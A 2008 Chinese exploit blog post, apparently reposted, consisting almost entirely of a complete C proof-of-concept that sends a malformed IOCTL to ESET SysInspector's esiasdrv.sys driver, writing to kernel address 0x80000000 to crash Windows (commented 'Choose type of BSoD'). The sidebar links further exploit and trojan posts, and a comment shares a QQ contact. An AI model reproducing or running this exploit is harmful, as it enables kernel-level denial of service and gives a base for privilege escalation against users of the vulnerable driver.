-
2008-10-03
ESET System Analyzer Tool - [网络攻防]
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
#include <stdio.h>
http://3xp-0day.blogbus.com/logs/29864394.html
#include <stdlib.h>
#include <windows.h>
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003
#define IOCTL_METHOD_NEIGHTER 0x00223C1F
#define BUFFER_LENGTH 0x04
typedef ULONG NTSTATUS;
typedef struct _UNICODE_STRING
{
/* 0x00 */ USHORT Length;
/* 0x02 */ USHORT MaximumLength;
/* 0x04 */ PWSTR Buffer;
/* 0x08 */
}
UNICODE_STRING,
*PUNICODE_STRING,
**PPUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
/* 0x00 */ ULONG Length;
/* 0x04 */ HANDLE RootDirectory;
/* 0x08 */ PUNICODE_STRING ObjectName;
/* 0x0C */ ULONG Attributes;
/* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
/* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
/* 0x18 */
}
OBJECT_ATTRIBUTES,
*POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;
typedef struct _IO_STATUS_BLOCK
{
union
{
/* 0x00 */ NTSTATUS Status;
/* 0x00 */ PVOID Pointer;
};
/* 0x04 */ ULONG Information;
/* 0x08 */
}
IO_STATUS_BLOCK,
*PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);
IMP_VOID RtlInitUnicodeString
(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
IMP_SYSCALL NtCreateFile
(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
IMP_SYSCALL NtDeviceIoControlFile
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);
IMP_SYSCALL NtDelayExecution
(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Interval
);
IMP_SYSCALL NtClose
(
IN HANDLE Handle
);
int __cdecl main(int argc, char **argv)
{
NTSTATUS NtStatus;
HANDLE DeviceHandle;
ULONG InputBuffer;
UNICODE_STRING DeviceName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
LARGE_INTEGER Interval;
///////////////////////////////////////////////////////////////////////////////////////////////
system("cls");
printf( " +----------------------------------------------------------------------------+\n"
" | |\n"
" | ESET, LLC. - http://www.eset.com/ |\n"
" | |\n"
" | Affected Software: |\n"
" | ESET System Analyzer Tool - 1.1.1.0 |\n"
" | |\n"
" | Affected Driver: |\n"
" | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys |\n"
" | Proof of Concept Exploit |\n"
" | |\n"
" +----------------------------------------------------------------------------+\n"
" | |\n"
" | NT Internals - http://www.ntinternals.org/ |\n"
" | alex ntinternals org |\n"
" | 01 October 2008 |\n"
" | |\n"
" +----------------------------------------------------------------------------+\n\n");
///////////////////////////////////////////////////////////////////////////////////////////////
RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv");
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName = &DeviceName;
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;
NtStatus = NtCreateFile(
&DeviceHandle, // FileHandle
FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess
&ObjectAttributes, // ObjectAttributes
&IoStatusBlock, // IoStatusBlock
NULL, // AllocationSize OPTIONAL
0, // FileAttributes
FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
FILE_OPEN_IF, // CreateDisposition
0, // CreateOptions
NULL, // EaBuffer OPTIONAL
0); // EaLength
/*
if(NtStatus)
{
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
*/
Interval.LowPart = 0xFF676980;
Interval.HighPart = 0xFFFFFFFF;
printf("\n 3");
NtDelayExecution(FALSE, &Interval);
printf(" 2");
NtDelayExecution(FALSE, &Interval);
printf(" 1");
NtDelayExecution(FALSE, &Interval);
printf(" Upss\n\n");
NtDelayExecution(FALSE, &Interval);
//
// Choose type of BSoD
//
// InputBuffer = 0x12345678;
InputBuffer = 0;
NtStatus = NtDeviceIoControlFile(
DeviceHandle, // FileHandle
NULL, // Event
NULL, // ApcRoutine
NULL, // ApcContext
&IoStatusBlock, // IoStatusBlock
IOCTL_METHOD_NEIGHTER, // FsControlCode
&InputBuffer, // InputBuffer
BUFFER_LENGTH, // InputBufferLength
(PVOID)0x80000000, // OutputBuffer
BUFFER_LENGTH); // OutBufferLength
if(NtStatus)
{
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
NtStatus = NtClose(DeviceHandle); // Handle
if(NtStatus)
{
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
return NtStatus;
}
return FALSE;历史上的今天:
QZone新版开始支持Firefox浏览器 2008-10-03VB100结果揭晓 金山毒霸三冠王 2008-10-03PhpCms2007 sp6 SQL injection 0day 2008-10-03随机文章:
上传漏洞利用方法 2008-09-14抵御DDoS攻击 2008-08-26批处理制作下载器 2008-08-19让对方运行你的木马的社会工程学艺术 2008-07-10另类ARP用法 探测网络中的黑客软件 2008-07-06
收藏到:Del.icio.us
3xp-0day'Blog
3xp-0day
搜索
最新日志
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞
- Serv-U 7.2.0.1 ftp file replacement
- MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded
- RealPlayer/Helix Player Remote Format String Exploit (linux)
- QZone新版开始支持Firefox浏览器
- VB100结果揭晓 金山毒霸三冠王
- PhpCms2007 sp6 SQL injection 0day
- ESET System Analyzer Tool
- 传说中微软最强的漏洞MS08052的利用代码
评论
具体的可否加我QQ:80068042详谈
麻烦加我的时候备注一下:百度
我好知道是你的ID
我好知道是你,谢谢!